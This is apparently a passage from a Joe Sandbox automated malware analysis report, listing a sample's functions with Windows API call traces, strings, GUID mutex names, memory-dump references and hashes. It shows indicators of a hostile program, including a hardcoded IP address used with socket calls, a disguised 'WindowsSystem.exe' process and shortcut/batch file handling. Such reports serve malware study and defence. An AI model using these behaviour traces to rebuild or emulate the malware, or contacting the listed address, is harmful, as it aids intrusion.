                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C82
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C98
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CB0
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316CC5
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316CDB
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CF3
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D08
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D1E
                                                                                                            • CloseHandle.KERNEL32(000002EC), ref: 0031BE8F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031BE9F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031BEC6
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031BED6
                                                                                                            • ExitProcess.KERNEL32 ref: 0031BEE7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                                                            • String ID: KERNEL32.DLL${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 2953619224-1144826392
                                                                                                            • Opcode ID: 6d0df5066db99bbfa826566ad9de00aa9d1a80acf1d84bfa3617d5351dd9e1cb
                                                                                                            • Instruction ID: 90f6fdd6ae6e4072f1f38e87b052713cd85742537835ff1a06a9e4e840afa8c9
                                                                                                            • Opcode Fuzzy Hash: 6d0df5066db99bbfa826566ad9de00aa9d1a80acf1d84bfa3617d5351dd9e1cb
                                                                                                            • Instruction Fuzzy Hash: 77A16D70904308EFDB2FAFA5ED997EEB6B8BB08715F104119F615A6290DB7449C4CF22
                                                                                                            Function 00321220 Relevance: 45.2, APIs: 30, Instructions: 186synchronizationmemorythreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00321EA0: lstrcpyA.KERNEL32(0037D4C0,185.157.162.216), ref: 00321EF4
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032117D
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211A0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003211B8
                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 0032126B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00321281
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 00321298
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321580,00000000,00000000,00000000), ref: 003212C4
                                                                                                            • GetTickCount.KERNEL32 ref: 003212E1
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321309
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321323
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032133E
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 003213D7
                                                                                                            • closesocket.WS2_32(00000000), ref: 003213E1
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003213F2
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003213FE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321419
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00321430
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032143A
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321453
                                                                                                            • closesocket.WS2_32(00000000), ref: 0032145D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321469
                                                                                                            • ExitProcess.KERNEL32 ref: 003214B0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003214C6
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003214D7
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003214E8
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003214F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321504
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032151B
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2113405211-0
                                                                                                            • Opcode ID: 52593a43761b2bfeb4c4af2bc3bafd78477e771791978a8e50038ead8aac305c
                                                                                                            • Instruction ID: 1c0ddf2fecc4f17f628b07255c957b7bec0d10d20c81a7dd2f318d549461f16d
                                                                                                            • Opcode Fuzzy Hash: 52593a43761b2bfeb4c4af2bc3bafd78477e771791978a8e50038ead8aac305c
                                                                                                            • Instruction Fuzzy Hash: F9714374900214EFDB2ADFA4EE8DBAE7779BF58701F208514F606A62E0C7789984CF50
                                                                                                            Function 00312F20 Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 129sleepregistrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{B189748B-D39F-48B3-A389-0325B737C49A}), ref: 00312F3F
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00312F5B
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00312F68
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}), ref: 00312F84
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00312FA2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00312FAF
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312FC5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312FDA
                                                                                                            • __snwprintf.LIBCMT ref: 0031301F
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0031302E
                                                                                                            • _memset.LIBCMT ref: 0031306A
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 003130A5
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 003130C2
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 003130E2
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003130F1
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003130FE
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031312E
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000000,00000000), ref: 00313147
                                                                                                            Strings
                                                                                                            • Software\%s, xrefs: 0031311D
                                                                                                            • {37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}, xrefs: 00312F78
                                                                                                            • {54A93AF2-DD4B-4995-A4AC-B7CC5F84077D}, xrefs: 00313002
                                                                                                            • %s\%s, xrefs: 0031300E
                                                                                                            • {B189748B-D39F-48B3-A389-0325B737C49A}, xrefs: 00312F33
                                                                                                            • {D3D2D73B-80E1-4BE8-8EAF-E74D52FB5827}, xrefs: 00313118
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWait__snwprintf_memsetlstrlenwnsprintf
                                                                                                            • String ID: %s\%s$Software\%s${37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}${54A93AF2-DD4B-4995-A4AC-B7CC5F84077D}${B189748B-D39F-48B3-A389-0325B737C49A}${D3D2D73B-80E1-4BE8-8EAF-E74D52FB5827}
                                                                                                            • API String ID: 1130256755-467414241
                                                                                                            • Opcode ID: 7d58d21c2fc157f0a7aee5c6822d769fa45cdc0cc5edd0c410375fc8ca1a62c9
                                                                                                            • Instruction ID: 142020ffc81b3a98890ae37f5c998b02e1a13d12dfa9357994e7ccf4f07df2e5
                                                                                                            • Opcode Fuzzy Hash: 7d58d21c2fc157f0a7aee5c6822d769fa45cdc0cc5edd0c410375fc8ca1a62c9
                                                                                                            • Instruction Fuzzy Hash: 98517C70E082589BDB769B20CC49BE977B8FF0C700F0081DAE50DA6290DBB86AC4CF51
                                                                                                            Function 0031B630 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 209synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0031B654
                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0031B678
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031B928
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B93D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B95D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B97D
                                                                                                            Strings
                                                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 0031B6C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$Create$EventFreeLocalMutex
                                                                                                            • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                                                            • API String ID: 4059844998-3593534564
                                                                                                            • Opcode ID: 3b5ff18b5b889cd29604c13ad9799b75b1e4a91450a84ca3d72ff26da25f8350
                                                                                                            • Instruction ID: 69420755ad8f8e33b7caccb786546ac6f50adf9a413db0837a82e7d530d34c27
                                                                                                            • Opcode Fuzzy Hash: 3b5ff18b5b889cd29604c13ad9799b75b1e4a91450a84ca3d72ff26da25f8350
                                                                                                            • Instruction Fuzzy Hash: 90914074A00314DFE72BDF64DD89BAAB7BDBF48701F148159E6096A2A0C7745AC4CF12
                                                                                                            Function 00328307 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00326189), ref: 0032830F
                                                                                                            • __mtterm.LIBCMT ref: 0032831B
                                                                                                              • Part of subcall function 00328054: DecodePointer.KERNEL32(00000004,0032847D,?,00326189), ref: 00328065
                                                                                                              • Part of subcall function 00328054: TlsFree.KERNEL32(00000003,0032847D,?,00326189), ref: 0032807F
                                                                                                              • Part of subcall function 00328054: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,0032847D,?,00326189), ref: 0032C612
                                                                                                              • Part of subcall function 00328054: _free.LIBCMT ref: 0032C615
                                                                                                              • Part of subcall function 00328054: DeleteCriticalSection.KERNEL32(00000003,76EF5810,?,0032847D,?,00326189), ref: 0032C63C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00328331
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0032833E
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0032834B
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00328358
                                                                                                            • TlsAlloc.KERNEL32(?,00326189), ref: 003283A8
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,00326189), ref: 003283C3
                                                                                                            • __init_pointers.LIBCMT ref: 003283CD
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283DE
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283EB
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 003283F8
                                                                                                            • EncodePointer.KERNEL32(?,00326189), ref: 00328405
                                                                                                            • DecodePointer.KERNEL32(003281D8,?,00326189), ref: 00328426
                                                                                                            • __calloc_crt.LIBCMT ref: 0032843B
                                                                                                            • DecodePointer.KERNEL32(00000000,?,00326189), ref: 00328455
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00328467
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                            • Opcode ID: ac57b548ad6b1d06d4f8689b08c3dc3d2d79d20a3bcd9bb33fc8c237e301460c
                                                                                                            • Instruction ID: a2e28c8b57849f279c87b47c21b731166947f7377b09c3b5cecbe7318c1a6ae2
                                                                                                            • Opcode Fuzzy Hash: ac57b548ad6b1d06d4f8689b08c3dc3d2d79d20a3bcd9bb33fc8c237e301460c
                                                                                                            • Instruction Fuzzy Hash: B4315AB59063219BC733AF75BC49A5A3BB8AF44760F61462AE50C972B0DF749481CF50
                                                                                                            Function 00319D60 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $o3Xo3$$o3Xo3$<$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$Xo3
                                                                                                            • API String ID: 0-914312535
                                                                                                            • Opcode ID: 2fccb9d8600250c57c48b926a7e796306cc1575472bfc2bbca637b5c017fea35
                                                                                                            • Instruction ID: 71660cb7a7b785a3133f7e8fc6e5abeafcf593abf6a4f4fad8b9fac96b7822a9
                                                                                                            • Opcode Fuzzy Hash: 2fccb9d8600250c57c48b926a7e796306cc1575472bfc2bbca637b5c017fea35
                                                                                                            • Instruction Fuzzy Hash: B9C10C70A00218EFDB65CFA4DC89BDEBBB9BF48305F108559E609AB280D77459C4CF51
                                                                                                            Function 00312920 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 117memoryprocessstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312952
                                                                                                            • __snwprintf.LIBCMT ref: 0031297C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031298B
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 003129A9
                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 003129BF
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003129D4
                                                                                                            • __snwprintf.LIBCMT ref: 00312A03
                                                                                                            • _memset.LIBCMT ref: 00312A13
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00312A3E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A4D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A57
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A61
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A6B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A7C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A86
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A90
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312A9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$__snwprintflstrlen$CreateFileFolderKnownModuleNamePathProcessTask_memsetlstrcmpi
                                                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsSystem.exe${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}
                                                                                                            • API String ID: 2642993909-1205724815
                                                                                                            • Opcode ID: 2a15b51a5c1898d805204e7036c82a480ec709050deb3066dc7684be791f9fe1
                                                                                                            • Instruction ID: a133ccf58657d4fc1e582e3e47729223367212c66f171bb49d5db02d0d286b9d
                                                                                                            • Opcode Fuzzy Hash: 2a15b51a5c1898d805204e7036c82a480ec709050deb3066dc7684be791f9fe1
                                                                                                            • Instruction Fuzzy Hash: AF416275A50205ABD735DBE4DC49FFEBB79AF48701F104528F609AA190DB749A80CB60
                                                                                                            Function 00313160 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 95memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,00315BA8), ref: 0031317A
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 00313196
                                                                                                            • __snwprintf.LIBCMT ref: 003131B7
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 003131C3
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003131CD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003131D7
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003131EA
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003131FF
                                                                                                            • __snwprintf.LIBCMT ref: 00313229
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313238
                                                                                                            • __snwprintf.LIBCMT ref: 00313263
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0031326F
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 00313279
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00313283
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031328D
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00313297
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc__snwprintf$DeleteFileFolderKnownPathTask$DirectoryRemove
                                                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${18925F49-C14F-4A5B-BA0F-9C4106DA4CB0}${9771290C-19FB-4434-8B1F-8952BA10F287}${A786AA22-8EF1-44CE-8698-6F3988CB643E}
                                                                                                            • API String ID: 1689349194-2992477535
                                                                                                            • Opcode ID: 8af4a9881c6af874fac3f47403e65f13032b72895fdc5414c703560e06f8b1e7
                                                                                                            • Instruction ID: 85965c07551038cdca95598a168fd5c7961bd01348c4bfbebb452303f026ad93
